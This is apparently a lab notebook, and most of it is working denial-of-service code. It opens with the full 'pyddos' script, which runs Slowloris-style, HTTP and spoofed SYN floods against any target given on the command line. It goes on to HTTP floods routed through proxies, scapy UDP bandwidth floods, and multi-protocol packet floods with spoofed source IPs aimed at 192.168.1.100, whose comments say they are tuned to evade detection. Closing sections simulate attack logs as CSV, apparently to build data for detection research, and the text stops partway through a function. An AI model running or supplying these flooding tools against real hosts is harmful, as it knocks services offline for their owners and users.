# Rquest Flood

In [ ]:
#!/usr/bin/env python3

version= '3.0'
title = '''

      _ \        __ \  __ \               ___|           _)       |
     |   | |   | |   | |   |  _ \   __| \___ \   __|  __| | __ \  __|
     ___/  |   | |   | |   | (   |\__ \       | (    |    | |   | |
    _|    \__, |____/ ____/ \___/ ____/ _____/ \___|_|   _| .__/ \__|
           ____/                                            _|

 DDos python script | Script used for testing ddos | Ddos attack
 Author: ___T7hM1___
 Github: http://github.com/t7hm1/pyddos
 Version:'''+version+'''
'''

import re
import os
import sys
import json
import time
import string
import signal
import  http.client,urllib.parse
from random import *
from socket import *
from struct import *
from threading import *
from argparse import ArgumentParser,RawTextHelpFormatter

if os.name == 'posix':
	c = os.system('which pip')
	if c == 256:
		os.system('sudo apt-get install python-pip')
	else:
		pass
else:
	print ('[-] Check your pip installer')

try:
	import requests,colorama
	from termcolor import colored,cprint
except:
	try:
		if os.name == 'posix':
			os.system('sudo pip install colorama termcolor requests')
			sys.exit('[+] I have installed necessary modules for you')
		elif os.name == 'nt':
			os.system('pip install colorama requests termcolor')
			sys.exit('[+] I have installed nessecary modules for you')
		else:
			sys.exit('[-] Download and install necessary modules')
	except Exception as e:
		print ('[-]',e)
if os.name == 'nt':
	colorama.init()

signal.signal(signal.SIGFPE,signal.SIG_DFL)

def fake_ip():
	while True:
		ips = [str(randrange(0,256)) for i in range(4)]
		if ips[0] == "127":
			continue
		fkip = '.'.join(ips)
		break
	return fkip

def check_tgt(args):
	tgt = args.d
	try:
		ip = gethostbyname(tgt)
	except:
		sys.exit(cprint('[-] Can\'t resolve host:Unknown host!','red'))
	return ip

def add_useragent():
	try:
		with open("./ua.txt","r") as fp:
			uagents = re.findall(r"(.+)\n",fp.read())
	except FileNotFoundError:
		cprint('[-] No file named \'ua.txt\',failed to load User-Agents','yellow')
		return []
	return uagents

def add_bots():
	bots=[]
	bots.append('http://www.bing.com/search?q=%40&count=50&first=0')
	bots.append('http://www.google.com/search?hl=en&num=100&q=intext%3A%40&ie=utf-8')
	return bots

class Pyslow:
	def __init__(self,
		        tgt,
		        port,
		        to,
		        threads,
		        sleep):
		self.tgt = tgt
		self.port = port
		self.to = to
		self.threads = threads
		self.sleep = sleep
		self.method = ['GET','POST']
		self.pkt_count = 0
	def mypkt(self):
		text = choice(self.method) + ' /' + str(randint(1,999999999)) + ' HTTP/1.1\r\n'+\
		      'Host:'+self.tgt+'\r\n'+\
		      'User-Agent:'+choice(add_useragent())+'\r\n'+\
		      'Content-Length: 42\r\n'
		pkt = buffer(text)
		return pkt
	def building_socket(self):
		try:
			sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)
			sock.settimeout(self.to)
			sock.connect((self.tgt,int(self.port)))
			self.pkt_count += 3
			if sock:
				sock.sendto(self.mypkt(),(self.tgt,int(self.port)))
				self.pkt_count += 1
		except Exception:
			sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)
			sock.settimeout(self.to)
			sock.connect((self.tgt,int(self.port)))
			sock.settimeout(None)
			self.pkt_count+=3
			if sock:
				sock.sendto(self.mypkt(),(self.tgt,int(self.port)))
				self.pkt_count+=1
		except KeyboardInterrupt:
			sys.exit(cprint('[-] Canceled by user','red'))
		return sock
	def sending_packets(self):
		try:
			sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)
			sock.settimeout(self.to)
			sock.connect((self.tgt,int(self.port)))
			self.pkt_count+=3
			if sock:
				sock.sendall('X-a: b\r\n')
				self.pkt+=1
		except Exception:
			sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)
			sock.settimeout(self.to)
			sock.connect((self.tgt,int(self.port)))
			sock.settimeout(None)
			if sock:
				sock.sendall('X-a: b\r\n')
				self.pkt_count+=1
		except KeyboardInterrupt:
			sys.exit(cprint('[-] Canceled by user','red'))
		return sock
	def doconnection(self):
		socks = 0
		fail=0
		lsocks=[]
		lhandlers=[]
		cprint('\t\tBuilding sockets','blue')
		while socks < (int(self.threads)):
			try:
				sock = self.building_socket()
				if sock:
					lsocks.append(sock)
					socks+=1
					if socks > int(self.threads):
						break
			except Exception:
				fail+=1
			except KeyboardInterrupt:
				sys.exit(cprint('[-] Canceled by user','red'))
		cprint('\t\tSending packets','blue')
		while socks < int(self.threads):
			try:
				handler = self.sending_packets()
				if handler:
					lhandlers.append(handler)
					socks+=1
					if socks > int(self.threads):
						break
				else:
					pass
			except Exception:
				fail+=1
			except KeyboardInterrupt:
				break
				sys.exit(cprint('[-] Canceled by user','red'))
		# print colored('I have sent ','green') + colored(str(self.pkt_count),'cyan') + colored(' packets successfully.Now i\'m going to sleep for ','green') + colored(self.sleep,'red') + colored(' second','green')
		time.sleep(self.sleep)

class Requester(Thread):
	def __init__(self,tgt):
		Thread.__init__(self)
		self.tgt = tgt
		self.port = None
		self.ssl = False
		self.req = []
		self.lock=Lock()
		url_type = urllib.parse.urlparse(self.tgt)
		if url_type.scheme == 'https':
			self.ssl = True
			if self.ssl == True:
				self.port = 443
		else:
			self.port = 80
	def header(self):
		cachetype = ['no-cache','no-store','max-age='+str(randint(0,10)),'max-stale='+str(randint(0,100)),'min-fresh='+str(randint(0,10)),'notransform','only-if-cache']
		acceptEc = ['compress,gzip','','*','compress;q=0,5, gzip;q=1.0','gzip;q=1.0, indentity; q=0.5, *;q=0']
		acceptC = ['ISO-8859-1','utf-8','Windows-1251','ISO-8859-2','ISO-8859-15']
		bot = add_bots()
		c=choice(cachetype)
		a=choice(acceptEc)
		http_header = {
		    'User-Agent' : choice(add_useragent()),
		    'Cache-Control' : c,
		    'Accept-Encoding' : a,
		    'Keep-Alive' : '42',
		    'Host' : self.tgt,
		    'Referer' : choice(bot)
		}
		return http_header
	def rand_str(self):
		mystr=[]
		for x in range(3):
			chars = tuple(string.ascii_letters+string.digits)
			text = (choice(chars) for _ in range(randint(7,14)))
			text = ''.join(text)
			mystr.append(text)
		return '&'.join(mystr)
	def create_url(self):
		return self.tgt + '?' + self.rand_str()
	def data(self):
		url = self.create_url()
		http_header = self.header()
		return (url,http_header)

	def run(self):
		try:
			if self.ssl:
				conn = http.client.HTTPSConnection(self.tgt,self.port)
			else:
				conn = http.client.HTTPConnection(self.tgt,self.port)
				self.req.append(conn)
			for reqter in self.req:
				(url,http_header) = self.data()
				method = choice(['get','post'])
				reqter.request(method.upper(),url,None,http_header)
		except KeyboardInterrupt:
			sys.exit(cprint('[-] Canceled by user','red'))
		except Exception as e:
			print (e)
		finally:
			self.closeConnections()
	def closeConnections(self):
		for conn in self.req:
			try:
				conn.close()
			except:
				pass

class Synflood(Thread):
	def __init__(self,tgt,ip,sock=None):
		Thread.__init__(self)
		self.tgt = tgt
		self.ip = ip
		self.psh = ''
		if sock is None:
			self.sock = socket(AF_INET,SOCK_RAW,IPPROTO_TCP)
			self.sock.setsockopt(IPPROTO_IP,IP_HDRINCL,1)
		else:
			self.sock=sock
		self.lock=Lock()
	def checksum(self):
		s = 0
		for i in range(0,len(self.psh),2):
			w = (ord(self.psh[i]) << 8) + (ord(self.psh[i+1]))
			s = s+w

		s = (s>>16) + (s & 0xffff)
		s = ~s & 0xffff

		return s
	def Building_packet(self):
		ihl=5
		version=4
		tos=0
		tot=40
		id=54321
		frag_off=0
		ttl=64
		protocol=IPPROTO_TCP
		check=10
		s_addr=inet_aton(self.ip)
		d_addr=inet_aton(self.tgt)

		ihl_version = (version << 4) + ihl
		ip_header = pack('!BBHHHBBH4s4s',ihl_version,tos,tot,id,frag_off,ttl,protocol,check,s_addr,d_addr)

		source = 54321
		dest = 80
		seq = 0
		ack_seq = 0
		doff = 5
		fin = 0
		syn = 1
		rst = 0
		ack = 0
		psh = 0
		urg = 0
		window = htons(5840)
		check = 0
		urg_prt = 0

		offset_res = (doff << 4)
		tcp_flags = fin + (syn << 1) + (rst << 2) + (psh << 3) + (ack << 4) + (urg << 5)
		tcp_header=pack('!HHLLBBHHH',source,dest,seq,ack_seq,offset_res,tcp_flags,window,check,urg_prt)

		src_addr = inet_aton(self.ip)
		dst_addr = inet_aton(self.tgt)
		place = 0
		protocol = IPPROTO_TCP
		tcp_length = len(tcp_header)

		self.psh = pack('!4s4sBBH',src_addr,dst_addr,place,protocol,tcp_length);
		self.psh = self.psh + tcp_header;

		tcp_checksum = self.checksum()

		tcp_header = pack('!HHLLBBHHH',source,dest,seq,ack_seq,offset_res,tcp_flags,window,tcp_checksum,urg_prt)
		packet = ip_header + tcp_header

		return packet

	def run(self):
		packet=self.Building_packet()
		try:
			self.lock.acquire()
			self.sock.sendto(packet,(self.tgt,0))
		except KeyboardInterrupt:
			sys.exit(cprint('[-] Canceled by user','red'))
		except Exception as e:
			cprint(e,'red')
		finally:
			self.lock.release()

def main():
	parser = ArgumentParser(
        usage='./%(prog)s -t [target] -p [port] -t [number threads]',
        formatter_class=RawTextHelpFormatter,
        prog='pyddos',
        description=cprint(title,'white',attrs=['bold']),
        epilog='''
Example:
    ./%(prog)s -d www.example.com -p 80 -T 2000 -Pyslow
    ./%(prog)s -d www.domain.com -s 100 -Request
    ./%(prog)s -d www.google.com -Synflood -T 5000 -t 10.0
'''
)
	options = parser.add_argument_group('options','')
	options.add_argument('-d',metavar='<ip|domain>',default=False,help='Specify your target such an ip or domain name')
	options.add_argument('-t',metavar='<float>',default=5.0,help='Set timeout for socket')
	options.add_argument('-T',metavar='<int>',default=1000,help='Set threads number for connection (default = 1000)')
	options.add_argument('-p',metavar='<int>',default=80,help='Specify port target (default = 80)' + colored(' |Only required with pyslow attack|','red'))
	options.add_argument('-s',metavar='<int>',default=100,help='Set sleep time for reconnection')
	options.add_argument('-i',metavar='<ip address>',default=False,help='Specify spoofed ip unless use fake ip')
	options.add_argument('-Request',action='store_true',help='Enable request target')
	options.add_argument('-Synflood',action='store_true',help='Enable synflood attack')
	options.add_argument('-Pyslow',action='store_true',help='Enable pyslow attack')
	options.add_argument('--fakeip',action='store_true',default=False,help='Option to create fake ip if not specify spoofed ip')
	args = parser.parse_args()
	if args.d == False:
		parser.print_help()
		sys.exit()
	add_bots();add_useragent()
	if args.d:
		check_tgt(args)
	if args.Synflood:
		uid = os.getpid()
		if uid == 0:
			cprint('[*] You have enough permisson to run this script','green')
			time.sleep(0.5)
		else:
			sys.exit(cprint('[-] You haven\'t enough permission to run this script','red'))
		tgt=check_tgt(args)
		synsock=socket(AF_INET,SOCK_RAW,IPPROTO_TCP)
		synsock.setsockopt(IPPROTO_IP,IP_HDRINCL,1)
		ts=[]
		threads=[]
		print (colored('[*] Started SYN Flood: ','blue')+colored(tgt,'red'))
		while 1:
			if args.i == False:
				args.fakeip = True
				if args.fakeip == True:
					ip = fake_ip()
			else:
				ip = args.i
			try:
				for x in range(0,int(args.T)):
					thread=Synflood(tgt,ip,sock=synsock)
					thread.setDaemon(True)
					thread.start()
					thread.join()
			except KeyboardInterrupt:
				sys.exit(cprint('[-] Canceled by user','red'))
	elif args.Request:
		tgt = args.d
		threads = []
		print (colored('[*] Start send request to: ','blue')+colored(tgt,'red'))
		while 1:
			try:
				for x in range(int(args.T)):
					t=Requester(tgt)
					t.daemon = True
					t.start()
					t.join()
			except KeyboardInterrupt:
				sys.exit(cprint('[-] Canceled by user','red'))
	elif args.Pyslow:
		try:
			tgt = args.d
			port = args.p
			to = float(args.t)
			st = int(args.s)
			threads = int(args.T)
		except Exception as e:
			print ('[-]',e)
		while 1:
			try:
				worker=Pyslow(tgt,port,to,threads,st)
				worker.doconnection()
			except KeyboardInterrupt:
				sys.exit(cprint('[-] Canceled by user','red'))
	if not (args.Synflood) and not (args.Request) and not (args.Pyslow):
		parser.print_help()
		print
		sys.exit(cprint('[-] You must choose attack type','red'))

if __name__ == '__main__':
	main()

## Brennan Subsection


### Complexities

In [ ]:
import requests
import random
import time
import threading

USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/91.0.4472.124",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Firefox/89.0",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X)"
]
ACCEPT_LANGUAGES = ["en-US,en;q=0.9", "fr-FR,fr;q=0.8", "es-ES,es;q=0.7"]
REFERERS = ["https://google.com", "https://bing.com", "https://duckduckgo.com"]

def simple_http_flood(url, num_requests=1000):
  for _ in range(num_requests):
    headers = {
      "User-Agent": random.choice(USER_AGENTS),
      "Accept-Language": random.choice(ACCEPT_LANGUAGES),
      "Referer": random.choice(REFERERS),
      "X-Forwarded-For": f"192.168.{random.randint(0, 255)}.{random.randint(1, 254)}"
    }
    delay = random.uniform(0.675, 5.0)
    try:
      requests.get(url, headers=headers, timeout=1)
    except:
      pass
    time.sleep(delay)

def start_simple_request_flood(url, num_threads=10, num_requests_per_thread=100):
  threads = []
  for _ in range(num_threads):
    t = threading.Thread(target=simple_http_flood, args=(url, num_requests_per_thread))
    t.start()
    threads.append(t)
  for t in threads:
    t.join()

In [ ]:
import random

USER_AGENTS = [
  "Mozilla/5.0", "curl/7.68.0", "python-requests/2.25.1"
]
METHODS = ["GET", "POST", "HEAD"]

# medium complexity function
def medium_http_flood(url, num_requests):
  for _ in range(num_requests):
    # use random request type when pinging the server
    method = random.choice(METHODS)

    # random users to better fake normal ppl
    headers = {"User-Agent": random.choice(USER_AGENTS)}
    try:
      # this will ping the website
      requests.request(method, url, headers=headers, timeout=1)
    except requests.exceptions.RequestException:
      continue


#### medium ddos attack v2

In [ ]:
import requests
import random
import time

# could add more user agents with different specifications especially
# with the types of os and browser being used
USER_AGENTS = [
  # Windows
  "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0",
  "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/121.0",
  "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edg/120.0.0.0",

  # macOS
  "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) Chrome/120.0.0.0",
  "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) Firefox/121.0",
  "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) Safari/604.1",

  # Linux
  "Mozilla/5.0 (X11; Linux x86_64) Firefox/121.0",
  "Mozilla/5.0 (X11; Linux x86_64) Chrome/120.0.0.0",

  # Mobile
  "Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) Safari/604.1",
  "Mozilla/5.0 (Linux; Android 14; Pixel 8) Chrome/120.0.0.0"
]


# Change which languages request being sent, maybe different languages are being used
# to look at the website to give further backing
ACCEPT_LANGUAGES = random.choices(
  population=[
    "en-US,en;q=0.9",
    "en-GB,en;q=0.8",
    "es-US,es;q=0.7,en;q=0.5",
  ],
  weights=[0.65, 0.15, 0.2],  # Adjust weights here if need be chose some generally acceptable
  k=1
)[0]


REFERERS = ["https://google.com", "https://bing.com", "https://duckduckgo.com"]

def medium_http_flood(url, num_requests):
  METHODS = ["GET", "POST", "HEAD"]
  for _ in range(num_requests):
    method = random.choice(METHODS)
    headers = {
      "User-Agent": random.choice(USER_AGENTS),
      "Accept-Language": random.choice(ACCEPT_LANGUAGES),
      "Referer": random.choice(REFERERS),
      "X-Forwarded-For": f"192.168.{random.randint(0, 255)}.{random.randint(1, 254)}"
    }
    delay = random.uniform(0.675, 5.0)
    try:
      requests.request(method, url, headers=headers, timeout=1)
    except:
      pass
    time.sleep(delay)

def start_medium_flood_attack(url, num_threads=10, num_requests_per_thread=100):
  threads = []
  for _ in range(num_threads):
    t = threading.Thread(target=medium_http_flood, args=(url, num_requests_per_thread))
    t.start()
    threads.append(t)
  for t in threads:
    t.join()


In [ ]:
import httpx
import asyncio

PROXIES = ["http://1.2.3.4:8080", "http://5.6.7.8:3128"]  # Replace with working proxies
PATHS = ["/", "/login", "/api", "/search?q=test"]
USER_AGENTS = [
  # Windows
  "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0",
  "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/121.0",
  "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edg/120.0.0.0",

  # macOS
  "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) Chrome/120.0.0.0",
  "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) Firefox/121.0",
  "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) Safari/604.1",

  # Linux
  "Mozilla/5.0 (X11; Linux x86_64) Firefox/121.0",
  "Mozilla/5.0 (X11; Linux x86_64) Chrome/120.0.0.0",

  # Mobile
  "Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) Safari/604.1",
  "Mozilla/5.0 (Linux; Android 14; Pixel 8) Chrome/120.0.0.0"
]


async def send_request(client, url):
  path = random.choice(PATHS)
  headers = {"User-Agent": random.choice(USER_AGENTS)}
  try:
    await client.get(f"{url}{path}", headers=headers)
  except Exception:
    pass

async def high_complexity_flood(url, num_requests):
  tasks = []
  for _ in range(num_requests):
    proxy = random.choice(PROXIES)
    async with httpx.AsyncClient(proxies=proxy, timeout=1) as client:
      tasks.append(send_request(client, url))
  await asyncio.gather(*tasks)

# Run with asyncio.run()

"""
What is asyncio.run()?
asyncio.run(coro) is used to run an async
function (coroutine) from a regular, synchronous
context (like the main script body).
"""


# Bandwidth Flood Attack

### Brennan Subsection


#### Complexities

In [ ]:
# Simple Bandwitdth Flood
from scapy.all import *

target_ip = "192.168.1.100"
target_port = 80  # our server port is 80

# just a while loop
while True:
    send(IP(dst=target_ip)/UDP(dport=target_port)/Raw(load="X"*600), verbose=False)


In [ ]:
# Medium Bandwith Flood Attack
import threading
import time
import random
from scapy.all import *

target_ip = "192.168.1.100"
target_port = 80
# ****************** IMPORTANT ******************
# Number of threads CHANGE DEPENDING ON THE AMOUNT THE VM CAN HANDLE
num_threads = 10
# ****************** IMPORTANT ******************

def flood():
  while True:
    # Vary payload size
    packet_size = random.randint(600, 1500)

    # Random delay between packets (100ms-500ms)
    delay = random.uniform(0.1, 0.5)
    send(IP(dst=target_ip)/UDP(dport=target_port)/Raw(load="X" * packet_size), verbose=False)
    time.sleep(delay)

threads = []
for i in range(num_threads):
  thread = threading.Thread(target=flood)
  thread.start()
  threads.append(thread)

for thread in threads:
  thread.join()


In [ ]:
# Complex Bandwitdth flood attack
import random
import threading
import time
from scapy.all import *

target_ip = "192.168.1.100"
target_port = 80
num_threads = 20  # More threads for higher impact

def generate_fake_ip():
  """Generate a random fake IP address."""
  return ".".join(str(random.randint(1, 255)) for _ in range(4))

def flood():
  while True:
    fake_ip = generate_fake_ip()
    fake_port = random.randint(1024, 65535)
    packet_size = random.randint(600, 1500)  # Vary payload size
    delay = random.uniform(0.1, 1.0)  # Random delay (100ms - 1s)

    send(IP(src=fake_ip, dst=target_ip)/UDP(sport=fake_port, dport=target_port)/Raw(load="X" * packet_size), verbose=False)

    time.sleep(delay)  # Introduce delay to look more like bot traffic

threads = []
for _ in range(num_threads):
  thread = threading.Thread(target=flood)
  thread.start()
  threads.append(thread)

for thread in threads:
  thread.join()

#### Data simulation

In [ ]:
from google.colab import drive
drive.mount('/content/drive')

Mounted at /content/drive


In [ ]:
import csv
import random
import time
from datetime import datetime
import pandas as pd
import os

# CSV file name
# change me to have the csv on ur drive
csv_filename = "/content/drive/MyDrive/Attack Sim files/simulated_attack_logs.csv"

# Target details (Replace with your actual target IP)
target_ip = "192.168.1.100"
target_port = 80

# List of commonly used public IP ranges for DDoS simulation
common_public_ips = [
  "3.{}.{}.{}".format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),   # AWS
  "34.{}.{}.{}".format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),  # Google Cloud
  "52.{}.{}.{}".format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),  # Azure
  "72.{}.{}.{}".format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),  # ISP-based IoT
  "192.157.{}.{}".format(random.randint(0, 255), random.randint(0, 255)),  # Mobile Carriers
  "103.{}.{}.{}".format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),  # VPN Networks
  "185.{}.{}.{}".format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))   # Proxy Networks
]

# List of possible attack protocols
protocols = ["UDP", "TCP", "ICMP"]

# List of attack types for more realism
attack_types = ["UDP Flood", "SYN Flood", "ICMP Flood", "HTTP Flood"]

# Function to generate a random IP
def generate_fake_ip():
  return ".".join(str(random.randint(1, 255)) for _ in range(4))

# Function to simulate Simple UDP Flood attack logs
def generate_simple_attack_log(num_packets=1000):
  attack_data = []
  for _ in range(num_packets):
    timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
    src_ip = "192.168.1.1"  # Static attacker IP (single source)
    dst_ip = target_ip
    src_port = random.randint(1024, 65535)
    dst_port = target_port
    protocol = "UDP"
    packet_size = 600  # Fixed payload size
    attack_type = "Simple UDP Flood"
    attack_data.append([timestamp, attack_type, src_ip, dst_ip, src_port, dst_port, protocol, packet_size])
    time.sleep(random.uniform(0.001, 0.005))  # Small delay
  return attack_data

# Function to simulate Medium UDP Flood attack logs (Multi-threaded with delays)
def generate_medium_attack_log(num_packets=1000):
  attack_data = []
  for _ in range(num_packets):
    timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
    src_ip = generate_fake_ip()  # Random IPs
    dst_ip = target_ip
    src_port = random.randint(1024, 65535)
    dst_port = target_port
    protocol = "UDP"
    packet_size = random.randint(600, 1200)  # Varying payload size
    attack_type = "Medium UDP Flood"
    attack_data.append([timestamp, attack_type, src_ip, dst_ip, src_port, dst_port, protocol, packet_size])
    time.sleep(random.uniform(0.005, 0.01))  # Slightly larger delay
  return attack_data

# Function to generate an improved attack log with protocol switching & realistic IPs
def generate_complex_attack_log(num_packets=1000):
  attack_data = []

  for _ in range(num_packets):
    timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
    src_ip = random.choice(common_public_ips)  # Select a realistic attack IP
    dst_ip = target_ip
    src_port = random.randint(1024, 65535)  # Random source port
    dst_port = target_port if random.choice(protocols) in ["TCP", "UDP"] else None  # No port for ICMP
    protocol = random.choice(protocols)  # Randomized protocol per packet
    packet_size = random.randint(600, 1500)  # Variable packet size
    attack_type = random.choice(attack_types)  # Random attack method

    attack_data.append([timestamp, attack_type, src_ip, dst_ip, src_port, dst_port, protocol, packet_size])

    time.sleep(random.uniform(0.001, 0.01))  # Introduce small delays for realism

  return attack_data

# Generate attack logs
# simple_logs = generate_simple_attack_log(1000)
# medium_logs = generate_medium_attack_log(1000)
complex_logs = generate_complex_attack_log(1000)

# Combine logs
# all_logs = simple_logs + medium_logs + complex_logs

# Function to save attack logs to CSV
def save_attack_logs(logs, filename, folder="/content/drive/MyDrive/Attack Sim files"):
  """
  Saves attack logs to a specified Google Drive folder.

  Parameters:
      logs (list): The attack log data.
      filename (str): The name of the CSV file.
      folder (str): The Google Drive directory where the file will be saved.
  """
  # Ensure the directory exists
  os.makedirs(folder, exist_ok=True)

  # Full path to save the file
  save_path = os.path.join(folder, filename)

  # Save logs to CSV
  with open(save_path, mode="w", newline="") as file:
    writer = csv.writer(file)
    writer.writerow(["Timestamp", "Attack Type", "Source IP", "Destination IP", "Source Port", "Destination Port", "Protocol", "Packet Size"])
    writer.writerows(logs)

  print(f"Saved attack log: {save_path}")

# Save each attack type separately
# save_attack_logs(simple_logs, "simple_attack_log.csv")
# save_attack_logs(medium_logs, "medium_attack_log.csv")
save_attack_logs(complex_logs, "complex_attack_log.csv")


# Save all logs combined
# save_attack_logs(all_logs, "combined_attack_log.csv")


# Display the CSV file for user preview

# df = pd.read_csv(csv_filename)
# df.head()

Saved attack log: /content/drive/MyDrive/Attack Sim files/complex_attack_log.csv


### Other Subsection

# Packet Flood Attack
**NOTE:**
- SYN Flood, ACK Flood, RST Flood, and ICMP Ping Flood are all forms of Packet flood attacks

## Brennan Subsection


###  Complexities
**Simple**: This attack targets TCP port 80 (HTTP) with SYN packets.

**Intermediate**: This attack switches between TCP and UDP to make filtering harder.

**Complex**: Spoofs real-world botnet IPs, Switches between SYN, UDP, ICMP, and HTTP and Mimics real web traffic to avoid detection.

In [ ]:
!pip install scapy


   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 2.4/2.4 MB 47.6 MB/s eta 0:00:00


In [ ]:
# Simple
from scapy.all import *
import time
import random

target_ip = "192.168.1.100"
target_port = 80

def simple_syn_flood():
    while True:
        src_port = random.randint(1024, 65535)
        packet = IP(dst=target_ip)/TCP(sport=src_port, dport=target_port, flags="S")
        send(packet, verbose=False)
        time.sleep(random.uniform(0.001, 0.005))  # Small delay for realism

simple_syn_flood()


KeyboardInterrupt: 

In [ ]:
# intermediate
import threading
from scapy.all import *
import time
import random

target_ip = "192.168.1.100"
target_port = 80

def medium_flood():
    while True:
        src_ip = "{}.{}.{}.{}".format(random.randint(1, 255), random.randint(1, 255), random.randint(1, 255), random.randint(1, 255))
        src_port = random.randint(1024, 65535)
        protocol = random.choice(["TCP", "UDP"])

        if protocol == "TCP":
            packet = IP(src=src_ip, dst=target_ip)/TCP(sport=src_port, dport=target_port, flags="S")
        else:
            packet = IP(src=src_ip, dst=target_ip)/UDP(sport=src_port, dport=target_port)/Raw(load="X"*random.randint(64, 512))

        send(packet, verbose=False)
        time.sleep(random.uniform(0.002, 0.01))  # Random delay for human-like behavior

# Use multiple threads to increase traffic
threads = []
for _ in range(10):
    thread = threading.Thread(target=medium_flood)
    thread.start()
    threads.append(thread)

for thread in threads:
    thread.join()

In [ ]:
# complex
import threading
import requests
from scapy.all import *
import time
import random

target_ip = "192.168.1.100"
target_url = "http://192.168.1.100"
target_port = 80

common_public_ips = [
    "3.{}.{}.{}".format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),  # AWS
    "34.{}.{}.{}".format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)), # Google Cloud
    "52.{}.{}.{}".format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)), # Azure
]

def complex_flood():
    while True:
        src_ip = random.choice(common_public_ips)  # Spoofed IP
        src_port = random.randint(1024, 65535)
        protocol = random.choice(["TCP", "UDP", "ICMP", "HTTP"])

        if protocol == "TCP":
            packet = IP(src=src_ip, dst=target_ip)/TCP(sport=src_port, dport=target_port, flags=random.choice(["S", "A", "R"]))
            send(packet, verbose=False)
        elif protocol == "UDP":
            packet = IP(src=src_ip, dst=target_ip)/UDP(sport=src_port, dport=target_port)/Raw(load="X"*random.randint(64, 1024))
            send(packet, verbose=False)
        elif protocol == "ICMP":
            packet = IP(src=src_ip, dst=target_ip)/ICMP()
            send(packet, verbose=False)
        elif protocol == "HTTP":
            try:
                requests.get(target_url)
            except:
                pass  # Ignore errors if the server blocks requests

        time.sleep(random.uniform(0.005, 0.02))  # Random delay to mimic human behavior

# Multi-threaded execution
threads = []
for _ in range(20):
    thread = threading.Thread(target=complex_flood)
    thread.start()
    threads.append(thread)

for thread in threads:
    thread.join()


### Data Simulation

In [ ]:
!pip install ace_tools

In [ ]:
import random
import csv
import time
import os
import pandas as pd
from datetime import datetime

# Target details (Replace with your actual target IP)
target_ip = "192.168.1.100"
target_port = 80

# Common public IP ranges for realistic botnet simulation
common_public_ips = [
    "3.{}.{}.{}".format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),   # AWS
    "34.{}.{}.{}".format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),  # Google Cloud
    "52.{}.{}.{}".format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),  # Azure
    "72.{}.{}.{}".format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),  # ISP-based IoT
    "192.157.{}.{}".format(random.randint(0, 255), random.randint(0, 255)),  # Mobile Carriers
    "103.{}.{}.{}".format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),  # VPN Networks
    "185.{}.{}.{}".format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))   # Proxy Networks
]

# List of common attack protocols
protocols = ["TCP", "UDP", "ICMP"]

# Attack Types
attack_types = ["SYN Flood", "ACK Flood", "RST Flood", "ICMP Ping Flood"]

# Function to simulate a Simple Packet Flood Attack
def generate_simple_packet_flood(num_packets=1000):
    attack_data = []
    for _ in range(num_packets):
        timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
        src_ip = "192.168.1.1"  # Static attacker IP
        dst_ip = target_ip
        src_port = random.randint(1024, 65535)
        dst_port = target_port
        protocol = "TCP"  # Simple attack uses only TCP
        packet_size = 64  # Small packet size to overwhelm processing
        attack_type = "Simple SYN Flood"
        attack_data.append([timestamp, attack_type, src_ip, dst_ip, src_port, dst_port, protocol, packet_size])
        time.sleep(random.uniform(0.001, 0.005))  # Small delay for realism
    return attack_data

# Function to simulate a Medium Packet Flood Attack with IP & Time Variance
def generate_medium_packet_flood(num_packets=1000):
    attack_data = []
    for _ in range(num_packets):
        timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
        src_ip = random.choice(common_public_ips)  # Select a realistic botnet IP
        dst_ip = target_ip
        src_port = random.randint(1024, 65535)
        dst_port = target_port
        protocol = random.choice(["TCP", "UDP"])  # Medium attack includes multiple protocols
        packet_size = random.randint(64, 512)  # Variable packet size
        attack_type = random.choice(["SYN Flood", "ACK Flood"])  # Medium-level attack types
        attack_data.append([timestamp, attack_type, src_ip, dst_ip, src_port, dst_port, protocol, packet_size])
        time.sleep(random.uniform(0.002, 0.01))  # Slightly larger delay for more human-like variation
    return attack_data

# Function to simulate a Complex Packet Flood Attack with Protocol & IP Variance
def generate_complex_packet_flood(num_packets=1000):
    attack_data = []
    for _ in range(num_packets):
